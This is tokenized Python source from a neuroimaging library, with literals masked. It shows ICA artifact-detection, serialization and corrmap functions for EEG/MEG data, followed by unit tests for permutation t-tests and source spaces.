, <EOL> sampling_rate = raw . info [ '<STR_LIT>' ] , <EOL> first_samp = raw . first_samp ) <EOL> return eog_events <EOL> def _get_target_ch ( container , target ) : <EOL> """<STR_LIT>""" <EOL> picks = pick_channels ( container . ch_names , include = [ target ] ) <EOL> ref_picks = pick_types ( container . info , meg = False , eeg = False , ref_meg = True ) <EOL> if len ( ref_picks ) > <NUM_LIT:0> : <EOL> picks = list ( set ( picks ) - set ( ref_picks ) ) <EOL> if len ( picks ) == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( target , container . ch_names ) ) <EOL> return picks <EOL> def _find_sources ( sources , target , score_func ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( score_func , string_types ) : <EOL> score_func = get_score_funcs ( ) . get ( score_func , score_func ) <EOL> if not callable ( score_func ) : <EOL> raise ValueError ( '<STR_LIT>' % score_func ) <EOL> scores = ( score_func ( sources , target ) if target is not None <EOL> else score_func ( sources , <NUM_LIT:1> ) ) <EOL> return scores <EOL> def _serialize ( dict_ , outer_sep = '<STR_LIT:;>' , inner_sep = '<STR_LIT::>' ) : <EOL> """<STR_LIT>""" <EOL> s = [ ] <EOL> for key , value in dict_ . items ( ) : <EOL> if callable ( value ) : <EOL> value = value . __name__ <EOL> elif isinstance ( value , int ) : <EOL> value = int ( value ) <EOL> elif isinstance ( value , dict ) : <EOL> for subkey , subvalue in value . items ( ) : <EOL> if isinstance ( subvalue , list ) : <EOL> if len ( subvalue ) > <NUM_LIT:0> : <EOL> if isinstance ( subvalue [ <NUM_LIT:0> ] , ( int , np . integer ) ) : <EOL> value [ subkey ] = [ int ( i ) for i in subvalue ] <EOL> for cls in ( np . random . RandomState , Covariance ) : <EOL> if isinstance ( value , cls ) : <EOL> value = cls . __name__ <EOL> s . append ( key + inner_sep + json . dumps ( value ) ) <EOL> return outer_sep . join ( s ) <EOL> def _deserialize ( str_ , outer_sep = '<STR_LIT:;>' , inner_sep = '<STR_LIT::>' ) : <EOL> """<STR_LIT>""" <EOL> out = { } <EOL> for mapping in str_ . split ( outer_sep ) : <EOL> k , v = mapping . split ( inner_sep , <NUM_LIT:1> ) <EOL> vv = json . loads ( v ) <EOL> out [ k ] = vv if not isinstance ( vv , text_type ) else str ( vv ) <EOL> return out <EOL> def _write_ica ( fid , ica ) : <EOL> """<STR_LIT>""" <EOL> ica_init = dict ( noise_cov = ica . noise_cov , <EOL> n_components = ica . n_components , <EOL> n_pca_components = ica . n_pca_components , <EOL> max_pca_components = ica . max_pca_components , <EOL> current_fit = ica . current_fit ) <EOL> if ica . info is not None : <EOL> start_block ( fid , FIFF . FIFFB_MEAS ) <EOL> write_id ( fid , FIFF . FIFF_BLOCK_ID ) <EOL> if ica . info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_PARENT_BLOCK_ID , ica . info [ '<STR_LIT>' ] ) <EOL> write_meas_info ( fid , ica . info ) <EOL> end_block ( fid , FIFF . FIFFB_MEAS ) <EOL> start_block ( fid , FIFF . FIFFB_MNE_ICA ) <EOL> write_string ( fid , FIFF . FIFF_MNE_ICA_INTERFACE_PARAMS , <EOL> _serialize ( ica_init ) ) <EOL> if ica . ch_names is not None : <EOL> write_name_list ( fid , FIFF . FIFF_MNE_ROW_NAMES , ica . ch_names ) <EOL> n_samples = getattr ( ica , '<STR_LIT>' , None ) <EOL> ica_misc = { '<STR_LIT>' : ( None if n_samples is None else int ( n_samples ) ) , <EOL> '<STR_LIT>' : getattr ( ica , '<STR_LIT>' , None ) } <EOL> write_string ( fid , FIFF . FIFF_MNE_ICA_INTERFACE_PARAMS , <EOL> _serialize ( ica_init ) ) <EOL> write_string ( fid , FIFF . FIFF_MNE_ICA_MISC_PARAMS , <EOL> _serialize ( ica_misc ) ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_WHITENER , ica . _pre_whitener ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_PCA_COMPONENTS , <EOL> ica . pca_components_ ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_PCA_MEAN , ica . pca_mean_ ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_PCA_EXPLAINED_VAR , <EOL> ica . pca_explained_variance_ ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_MATRIX , ica . unmixing_matrix_ ) <EOL> write_int ( fid , FIFF . FIFF_MNE_ICA_BADS , ica . exclude ) <EOL> end_block ( fid , FIFF . FIFFB_MNE_ICA ) <EOL> @ verbose <EOL> def read_ica ( fname ) : <EOL> """<STR_LIT>""" <EOL> check_fname ( fname , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> logger . info ( '<STR_LIT>' % fname ) <EOL> fid , tree , _ = fiff_open ( fname ) <EOL> try : <EOL> info , meas = read_meas_info ( fid , tree , clean_bads = True ) <EOL> except ValueError : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> info = None <EOL> else : <EOL> info [ '<STR_LIT:filename>' ] = fname <EOL> ica_data = dir_tree_find ( tree , FIFF . FIFFB_MNE_ICA ) <EOL> if len ( ica_data ) == <NUM_LIT:0> : <EOL> ica_data = dir_tree_find ( tree , <NUM_LIT> ) <EOL> if len ( ica_data ) == <NUM_LIT:0> : <EOL> fid . close ( ) <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> my_ica_data = ica_data [ <NUM_LIT:0> ] <EOL> for d in my_ica_data [ '<STR_LIT>' ] : <EOL> kind = d . kind <EOL> pos = d . pos <EOL> if kind == FIFF . FIFF_MNE_ICA_INTERFACE_PARAMS : <EOL> tag = read_tag ( fid , pos ) <EOL> ica_init = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ROW_NAMES : <EOL> tag = read_tag ( fid , pos ) <EOL> ch_names = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_WHITENER : <EOL> tag = read_tag ( fid , pos ) <EOL> pre_whitener = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_PCA_COMPONENTS : <EOL> tag = read_tag ( fid , pos ) <EOL> pca_components = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_PCA_EXPLAINED_VAR : <EOL> tag = read_tag ( fid , pos ) <EOL> pca_explained_variance = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_PCA_MEAN : <EOL> tag = read_tag ( fid , pos ) <EOL> pca_mean = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_MATRIX : <EOL> tag = read_tag ( fid , pos ) <EOL> unmixing_matrix = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_BADS : <EOL> tag = read_tag ( fid , pos ) <EOL> exclude = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_MISC_PARAMS : <EOL> tag = read_tag ( fid , pos ) <EOL> ica_misc = tag . data <EOL> fid . close ( ) <EOL> ica_init , ica_misc = [ _deserialize ( k ) for k in ( ica_init , ica_misc ) ] <EOL> current_fit = ica_init . pop ( '<STR_LIT>' ) <EOL> if ica_init [ '<STR_LIT>' ] == Covariance . __name__ : <EOL> logger . info ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> def f ( x ) : <EOL> return x . astype ( np . float64 ) <EOL> ica_init = dict ( ( k , v ) for k , v in ica_init . items ( ) <EOL> if k in _get_args ( ICA . __init__ ) ) <EOL> ica = ICA ( ** ica_init ) <EOL> ica . current_fit = current_fit <EOL> ica . ch_names = ch_names . split ( '<STR_LIT::>' ) <EOL> ica . _pre_whitener = f ( pre_whitener ) <EOL> ica . pca_mean_ = f ( pca_mean ) <EOL> ica . pca_components_ = f ( pca_components ) <EOL> ica . n_components_ = unmixing_matrix . shape [ <NUM_LIT:0> ] <EOL> ica . pca_explained_variance_ = f ( pca_explained_variance ) <EOL> ica . unmixing_matrix_ = f ( unmixing_matrix ) <EOL> ica . mixing_matrix_ = linalg . pinv ( ica . unmixing_matrix_ ) <EOL> ica . exclude = [ ] if exclude is None else list ( exclude ) <EOL> ica . info = info <EOL> if '<STR_LIT>' in ica_misc : <EOL> ica . n_samples_ = ica_misc [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ica_misc : <EOL> ica . labels_ = ica_misc [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' ) <EOL> return ica <EOL> _ica_node = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _detect_artifacts ( ica , raw , start_find , stop_find , ecg_ch , ecg_score_func , <EOL> ecg_criterion , eog_ch , eog_score_func , eog_criterion , <EOL> skew_criterion , kurt_criterion , var_criterion , <EOL> add_nodes ) : <EOL> """<STR_LIT>""" <EOL> from scipy import stats <EOL> nodes = [ ] <EOL> if ecg_ch is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , ecg_ch , ecg_score_func , ecg_criterion ) ] <EOL> if eog_ch not in [ None , [ ] ] : <EOL> if not isinstance ( eog_ch , list ) : <EOL> eog_ch = [ eog_ch ] <EOL> for idx , ch in enumerate ( eog_ch ) : <EOL> nodes += [ _ica_node ( '<STR_LIT>' % idx , ch , eog_score_func , <EOL> eog_criterion ) ] <EOL> if skew_criterion is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , None , stats . skew , skew_criterion ) ] <EOL> if kurt_criterion is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , None , stats . kurtosis , kurt_criterion ) ] <EOL> if var_criterion is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , None , np . var , var_criterion ) ] <EOL> if add_nodes is not None : <EOL> nodes . extend ( add_nodes ) <EOL> for node in nodes : <EOL> scores = ica . score_sources ( raw , start = start_find , stop = stop_find , <EOL> target = node . target , <EOL> score_func = node . score_func ) <EOL> if isinstance ( node . criterion , float ) : <EOL> found = list ( np . where ( np . abs ( scores ) > node . criterion ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> found = list ( np . atleast_1d ( abs ( scores ) . argsort ( ) [ node . criterion ] ) ) <EOL> case = ( len ( found ) , '<STR_LIT:s>' if len ( found ) > <NUM_LIT:1> else '<STR_LIT>' , node . name ) <EOL> logger . info ( '<STR_LIT>' % case ) <EOL> ica . exclude += found <EOL> logger . info ( '<STR_LIT>' + str ( ica . exclude ) . strip ( '<STR_LIT>' ) ) <EOL> if len ( set ( ica . exclude ) ) != len ( ica . exclude ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> ica . exclude = list ( set ( ica . exclude ) ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> @ verbose <EOL> def run_ica ( raw , n_components , max_pca_components = <NUM_LIT:100> , <EOL> n_pca_components = <NUM_LIT:64> , noise_cov = None , random_state = None , <EOL> picks = None , start = None , stop = None , start_find = None , <EOL> stop_find = None , ecg_ch = None , ecg_score_func = '<STR_LIT>' , <EOL> ecg_criterion = <NUM_LIT:0.1> , eog_ch = None , eog_score_func = '<STR_LIT>' , <EOL> eog_criterion = <NUM_LIT:0.1> , skew_criterion = - <NUM_LIT:1> , kurt_criterion = - <NUM_LIT:1> , <EOL> var_criterion = <NUM_LIT:0> , add_nodes = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> ica = ICA ( n_components = n_components , max_pca_components = max_pca_components , <EOL> n_pca_components = n_pca_components , noise_cov = noise_cov , <EOL> random_state = random_state , verbose = verbose ) <EOL> ica . fit ( raw , start = start , stop = stop , picks = picks ) <EOL> logger . info ( '<STR_LIT:%s>' % ica ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> _detect_artifacts ( ica = ica , raw = raw , start_find = start_find , <EOL> stop_find = stop_find , ecg_ch = ecg_ch , <EOL> ecg_score_func = ecg_score_func , <EOL> ecg_criterion = ecg_criterion , eog_ch = eog_ch , <EOL> eog_score_func = eog_score_func , <EOL> eog_criterion = eog_criterion , <EOL> skew_criterion = skew_criterion , <EOL> kurt_criterion = kurt_criterion , <EOL> var_criterion = var_criterion , <EOL> add_nodes = add_nodes ) <EOL> return ica <EOL> @ verbose <EOL> def _band_pass_filter ( ica , sources , target , l_freq , h_freq , verbose = None ) : <EOL> if l_freq is not None and h_freq is not None : <EOL> logger . info ( '<STR_LIT>' ) <EOL> sources = band_pass_filter ( sources , ica . info [ '<STR_LIT>' ] , <EOL> l_freq , h_freq , method = '<STR_LIT>' , <EOL> verbose = verbose ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> target = band_pass_filter ( target , ica . info [ '<STR_LIT>' ] , <EOL> l_freq , h_freq , method = '<STR_LIT>' , <EOL> verbose = verbose ) <EOL> elif l_freq is not None or h_freq is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return sources , target <EOL> def _get_ica_map ( ica , components = None ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> if components is None : <EOL> components = list ( range ( ica . n_components_ ) ) <EOL> maps = fast_dot ( ica . mixing_matrix_ [ : , components ] . T , <EOL> ica . pca_components_ [ : ica . n_components_ ] ) <EOL> return maps <EOL> def _find_max_corrs ( all_maps , target , threshold ) : <EOL> """<STR_LIT>""" <EOL> all_corrs = [ compute_corr ( target , subj . T ) for subj in all_maps ] <EOL> abs_corrs = [ np . abs ( a ) for a in all_corrs ] <EOL> corr_polarities = [ np . sign ( a ) for a in all_corrs ] <EOL> if threshold <= <NUM_LIT:1> : <EOL> max_corrs = [ list ( np . nonzero ( s_corr > threshold ) [ <NUM_LIT:0> ] ) <EOL> for s_corr in abs_corrs ] <EOL> else : <EOL> max_corrs = [ list ( find_outliers ( s_corr , threshold = threshold ) ) <EOL> for s_corr in abs_corrs ] <EOL> am = [ l [ i ] for l , i_s in zip ( abs_corrs , max_corrs ) <EOL> for i in i_s ] <EOL> median_corr_with_target = np . median ( am ) if len ( am ) > <NUM_LIT:0> else <NUM_LIT:0> <EOL> polarities = [ l [ i ] for l , i_s in zip ( corr_polarities , max_corrs ) <EOL> for i in i_s ] <EOL> maxmaps = [ l [ i ] for l , i_s in zip ( all_maps , max_corrs ) <EOL> for i in i_s ] <EOL> if len ( maxmaps ) == <NUM_LIT:0> : <EOL> return [ ] , <NUM_LIT:0> , <NUM_LIT:0> , [ ] <EOL> newtarget = np . zeros ( maxmaps [ <NUM_LIT:0> ] . size ) <EOL> std_of_maps = np . std ( np . asarray ( maxmaps ) ) <EOL> mean_of_maps = np . std ( np . asarray ( maxmaps ) ) <EOL> for maxmap , polarity in zip ( maxmaps , polarities ) : <EOL> newtarget += ( maxmap / std_of_maps - mean_of_maps ) * polarity <EOL> newtarget /= len ( maxmaps ) <EOL> newtarget *= std_of_maps <EOL> sim_i_o = np . abs ( np . corrcoef ( target , newtarget ) [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> return newtarget , median_corr_with_target , sim_i_o , max_corrs <EOL> def _plot_corrmap ( data , subjs , indices , ch_type , ica , label , show , outlines , <EOL> layout , cmap , contours , template = True ) : <EOL> """<STR_LIT>""" <EOL> if not template : <EOL> title = '<STR_LIT>' <EOL> if label is not None : <EOL> title += '<STR_LIT>' + label <EOL> else : <EOL> title = "<STR_LIT>" <EOL> picks = list ( range ( len ( data ) ) ) <EOL> p = <NUM_LIT:20> <EOL> if len ( picks ) > p : <EOL> n_components = len ( picks ) <EOL> figs = [ _plot_corrmap ( data [ k : k + p ] , subjs [ k : k + p ] , <EOL> indices [ k : k + p ] , ch_type , ica , label , show , <EOL> outlines = outlines , layout = layout , cmap = cmap , <EOL> contours = contours ) <EOL> for k in range ( <NUM_LIT:0> , n_components , p ) ] <EOL> return figs <EOL> elif np . isscalar ( picks ) : <EOL> picks = [ picks ] <EOL> data_picks , pos , merge_grads , names , _ = _prepare_topo_plot ( <EOL> ica , ch_type , layout ) <EOL> pos , outlines = _check_outlines ( pos , outlines ) <EOL> data = np . atleast_2d ( data ) <EOL> data = data [ : , data_picks ] <EOL> fig , axes = _prepare_trellis ( len ( picks ) , max_col = <NUM_LIT:5> ) <EOL> fig . suptitle ( title ) <EOL> if merge_grads : <EOL> from . . channels . layout import _merge_grad_data <EOL> for ii , data_ , ax , subject , idx in zip ( picks , data , axes , subjs , indices ) : <EOL> if template : <EOL> ttl = '<STR_LIT>' . format ( subject , idx ) <EOL> ax . set_title ( ttl , fontsize = <NUM_LIT:12> ) <EOL> data_ = _merge_grad_data ( data_ ) if merge_grads else data_ <EOL> vmin_ , vmax_ = _setup_vmin_vmax ( data_ , None , None ) <EOL> plot_topomap ( data_ . flatten ( ) , pos , vmin = vmin_ , vmax = vmax_ , <EOL> res = <NUM_LIT:64> , axes = ax , cmap = cmap , outlines = outlines , <EOL> image_mask = None , contours = contours , show = False , <EOL> image_interp = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> _hide_frame ( ax ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( show ) <EOL> return fig <EOL> @ verbose <EOL> def corrmap ( icas , template , threshold = "<STR_LIT>" , label = None , ch_type = "<STR_LIT>" , <EOL> plot = True , show = True , verbose = None , outlines = '<STR_LIT>' , layout = None , <EOL> sensors = True , contours = <NUM_LIT:6> , cmap = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( plot , bool ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if threshold == '<STR_LIT>' : <EOL> threshold = np . arange ( <NUM_LIT> , <NUM_LIT> , dtype = np . float64 ) / <NUM_LIT> <EOL> all_maps = [ _get_ica_map ( ica ) for ica in icas ] <EOL> if len ( template ) == <NUM_LIT:2> : <EOL> target = all_maps [ template [ <NUM_LIT:0> ] ] [ template [ <NUM_LIT:1> ] ] <EOL> is_subject = True <EOL> elif template . ndim == <NUM_LIT:1> and len ( template ) == all_maps [ <NUM_LIT:0> ] . shape [ <NUM_LIT:1> ] : <EOL> target = template <EOL> is_subject = False <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> template_fig , labelled_ics = None , None <EOL> if plot is True : <EOL> if is_subject : <EOL> ttl = '<STR_LIT>' . format ( str ( template [ <NUM_LIT:0> ] ) ) <EOL> template_fig = icas [ template [ <NUM_LIT:0> ] ] . plot_components ( <EOL> picks = template [ <NUM_LIT:1> ] , ch_type = ch_type , title = ttl , <EOL> outlines = outlines , cmap = cmap , contours = contours , layout = layout , <EOL> show = show ) <EOL> else : <EOL> template_fig = _plot_corrmap ( [ template ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , ch_type , <EOL> icas [ <NUM_LIT:0> ] . copy ( ) , "<STR_LIT>" , <EOL> outlines = outlines , cmap = cmap , <EOL> contours = contours , layout = layout , <EOL> show = show , template = True ) <EOL> template_fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> template_fig . canvas . draw ( ) <EOL> if isinstance ( threshold , ( int , float ) ) : <EOL> if len ( all_maps ) == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return icas <EOL> nt , mt , s , mx = _find_max_corrs ( all_maps , target , threshold ) <EOL> elif len ( threshold ) > <NUM_LIT:1> : <EOL> paths = [ _find_max_corrs ( all_maps , target , t ) for t in threshold ] <EOL> nt , mt , s , mx = paths [ np . argmax ( [ path [ <NUM_LIT:2> ] for path in paths ] ) ] <EOL> if isinstance ( threshold , ( int , float ) ) : <EOL> if len ( all_maps ) == <NUM_LIT:0> or len ( nt ) == <NUM_LIT:0> : <EOL> if threshold > <NUM_LIT:1> : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return icas <EOL> nt , mt , s , mx = _find_max_corrs ( all_maps , nt , threshold ) <EOL> elif len ( threshold ) > <NUM_LIT:1> : <EOL> paths = [ _find_max_corrs ( all_maps , nt , t ) for t in threshold ] <EOL> nt , mt , s , mx = paths [ np . argmax ( [ path [ <NUM_LIT:1> ] for path in paths ] ) ] <EOL> allmaps , indices , subjs , nones = [ list ( ) for _ in range ( <NUM_LIT:4> ) ] <EOL> logger . info ( '<STR_LIT>' % mt ) <EOL> if plot is True : <EOL> logger . info ( '<STR_LIT>' ) <EOL> for ii , ( ica , max_corr ) in enumerate ( zip ( icas , mx ) ) : <EOL> if ( label is not None ) and ( not hasattr ( ica , '<STR_LIT>' ) ) : <EOL> ica . labels_ = dict ( ) <EOL> if len ( max_corr ) > <NUM_LIT:0> : <EOL> if isinstance ( max_corr [ <NUM_LIT:0> ] , np . ndarray ) : <EOL> max_corr = max_corr [ <NUM_LIT:0> ] <EOL> if label is not None : <EOL> ica . labels_ [ label ] = list ( set ( list ( max_corr ) + <EOL> ica . labels_ . get ( label , list ( ) ) ) ) <EOL> if plot is True : <EOL> allmaps . extend ( _get_ica_map ( ica , components = max_corr ) ) <EOL> subjs . extend ( [ ii ] * len ( max_corr ) ) <EOL> indices . extend ( max_corr ) <EOL> else : <EOL> if ( label is not None ) and ( label not in ica . labels_ ) : <EOL> ica . labels_ [ label ] = list ( ) <EOL> nones . append ( ii ) <EOL> if len ( nones ) == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' + <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ str ( x ) for x in nones ] ) + <EOL> '<STR_LIT>' ) <EOL> if plot is True : <EOL> labelled_ics = _plot_corrmap ( allmaps , subjs , indices , ch_type , ica , <EOL> label , outlines = outlines , cmap = cmap , <EOL> contours = contours , layout = layout , <EOL> show = show ) <EOL> return template_fig , labelled_ics <EOL> else : <EOL> return None </s>
<s> import numpy as np <EOL> from numpy . testing import assert_array_equal , assert_almost_equal <EOL> from scipy import stats <EOL> from mne . stats . permutations import permutation_t_test <EOL> def test_permutation_t_test ( ) : <EOL> """<STR_LIT>""" <EOL> np . random . seed ( <NUM_LIT:10> ) <EOL> n_samples , n_tests = <NUM_LIT:30> , <NUM_LIT:5> <EOL> X = np . random . randn ( n_samples , n_tests ) <EOL> X [ : , : <NUM_LIT:2> ] += <NUM_LIT:1> <EOL> T_obs , p_values , H0 = permutation_t_test ( X , n_permutations = <NUM_LIT> , tail = <NUM_LIT:0> ) <EOL> is_significant = p_values < <NUM_LIT> <EOL> assert_array_equal ( is_significant , [ True , True , False , False , False ] ) <EOL> T_obs , p_values , H0 = permutation_t_test ( X , n_permutations = <NUM_LIT> , tail = <NUM_LIT:1> ) <EOL> is_significant = p_values < <NUM_LIT> <EOL> assert_array_equal ( is_significant , [ True , True , False , False , False ] ) <EOL> T_obs , p_values , H0 = permutation_t_test ( X , n_permutations = <NUM_LIT> , tail = - <NUM_LIT:1> ) <EOL> is_significant = p_values < <NUM_LIT> <EOL> assert_array_equal ( is_significant , [ False , False , False , False , False ] ) <EOL> X = np . random . randn ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> T_obs , p_values , H0 = permutation_t_test ( X [ : , [ <NUM_LIT:0> ] ] , n_permutations = '<STR_LIT:all>' ) <EOL> T_obs_scipy , p_values_scipy = stats . ttest_1samp ( X [ : , <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> assert_almost_equal ( T_obs [ <NUM_LIT:0> ] , T_obs_scipy , <NUM_LIT:8> ) <EOL> assert_almost_equal ( p_values [ <NUM_LIT:0> ] , p_values_scipy , <NUM_LIT:2> ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import os . path as op <EOL> from nose . tools import assert_true , assert_raises <EOL> from nose . plugins . skip import SkipTest <EOL> import numpy as np <EOL> from numpy . testing import assert_array_equal , assert_allclose , assert_equal <EOL> import warnings <EOL> from mne . datasets import testing <EOL> from mne import ( read_source_spaces , vertex_to_mni , write_source_spaces , <EOL> setup_source_space , setup_volume_source_space , <EOL> add_source_space_distances , read_bem_surfaces , <EOL> morph_source_spaces , SourceEstimate ) <EOL> from mne . utils import ( _TempDir , requires_fs_or_nibabel , requires_nibabel , <EOL> requires_freesurfer , run_subprocess , slow_test , <EOL> requires_mne , requires_version , run_tests_if_main ) <EOL> from mne . surface import _accumulate_normals , _triangle_neighbors <EOL> from mne . source_space import _get_mri_header , _get_mgz_header <EOL> from mne . externals . six . moves import zip <EOL> from mne . source_space import ( get_volume_labels_from_aseg , SourceSpaces , <EOL> _compare_source_spaces ) <EOL> from mne . tests . common import assert_naming <EOL> from mne . io . constants import FIFF <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> data_path = testing . data_path ( download = False ) <EOL> subjects_dir = op . join ( data_path , '<STR_LIT>' ) <EOL> fname_mri = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fname = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fname_vol = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> fname_bem = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> fname_fs = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fname_morph = op . join ( subjects_dir , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> base_dir = op . join ( op . dirname ( __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' ) <EOL> fname_small = op . join ( base_dir , '<STR_LIT>' ) <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> @ testing . requires_testing_data <EOL> @ requires_nibabel ( vox2ras_tkr = True ) <EOL> def test_mgz_header ( ) : <EOL> """<STR_LIT>""" <EOL> header = _get_mgz_header ( fname_mri ) <EOL> mri_hdr = _get_mri_header ( fname_mri ) <EOL> assert_allclose ( mri_hdr . get_data_shape ( ) , header [ '<STR_LIT>' ] ) <EOL> assert_allclose ( mri_hdr . get_vox2ras_tkr ( ) , header [ '<STR_LIT>' ] ) <EOL> assert_allclose ( mri_hdr . get_ras2vox ( ) , header [ '<STR_LIT>' ] ) <EOL> @ requires_version ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_patch_info ( ) : <EOL> """<STR_LIT>""" <EOL> src = read_source_spaces ( fname_small ) <EOL> src_new = read_source_spaces ( fname_small ) <EOL> for s in src_new : <EOL> s [ '<STR_LIT>' ] = None <EOL> s [ '<STR_LIT>' ] = None <EOL> s [ '<STR_LIT>' ] = None <EOL> try : <EOL> add_source_space_distances ( src_new , dist_limit = <NUM_LIT> ) <EOL> except RuntimeError : <EOL> pass <EOL> else : <EOL> assert_true ( all ( s [ '<STR_LIT>' ] is None for s in src_new ) ) <EOL> assert_true ( all ( s [ '<STR_LIT>' ] is None for s in src_new ) ) <EOL> assert_true ( all ( s [ '<STR_LIT>' ] is None for s in src_new ) ) <EOL> add_source_space_distances ( src_new ) <EOL> for s1 , s2 in zip ( src , src_new ) : <EOL> assert_array_equal ( s1 [ '<STR_LIT>' ] , s2 [ '<STR_LIT>' ] ) <EOL> assert_allclose ( s1 [ '<STR_LIT>' ] , s2 [ '<STR_LIT>' ] , atol = <NUM_LIT> ) <EOL> assert_equal ( len ( s1 [ '<STR_LIT>' ] ) , len ( s2 [ '<STR_LIT>' ] ) ) <EOL> for p1 , p2 in zip ( s1 [ '<STR_LIT>' ] , s2 [ '<STR_LIT>' ] ) : <EOL> assert_array_equal ( p1 , p2 ) <EOL> @ testing . requires_testing_data <EOL> @ requires_version ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_source_space_distances_limited ( ) : <EOL> """<STR_LIT>""" <EOL> tempdir = _TempDir ( ) <EOL> src = read_source_spaces ( fname ) <EOL> src_new = read_source_spaces ( fname ) <EOL> del src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> n_do = <NUM_LIT:200> <EOL> src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] = src_new [ <NUM_LIT:1> ] [ '<STR_LIT>' ] [ : n_do ] . copy ( ) <EOL> out_name = op . join ( tempdir , '<STR_LIT>' ) <EOL> try : <EOL> add_source_space_distances ( src_new , dist_limit = <NUM_LIT> ) <EOL> except RuntimeError : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> write_source_spaces ( out_name , src_new ) <EOL> src_new = read_source_spaces ( out_name ) <EOL> for so , sn in zip ( src , src_new ) : <EOL> assert_array_equal ( so [ '<STR_LIT>' ] , np . array ( [ - <NUM_LIT> ] , np . float32 ) ) <EOL> assert_array_equal ( sn [ '<STR_LIT>' ] , np . array ( [ <NUM_LIT> ] , np . float32 ) ) <EOL> do = so [ '<STR_LIT>' ] <EOL> dn = sn [ '<STR_LIT>' ] <EOL> do . data [ do . data > <NUM_LIT> ] = <NUM_LIT:0> <EOL> do . eliminate_zeros ( ) <EOL> assert_true ( np . sum ( do . data < <NUM_LIT> ) > <NUM_LIT> ) <EOL> d = ( do - dn ) [ : sn [ '<STR_LIT>' ] [ n_do - <NUM_LIT:1> ] ] [ : , : sn [ '<STR_LIT>' ] [ n_do - <NUM_LIT:1> ] ] <EOL> assert_allclose ( np . zeros_like ( d . data ) , d . data , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> @ slow_test <EOL> @ testing . requires_testing_data <EOL> @ requires_version ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_source_space_distances ( ) : <EOL> 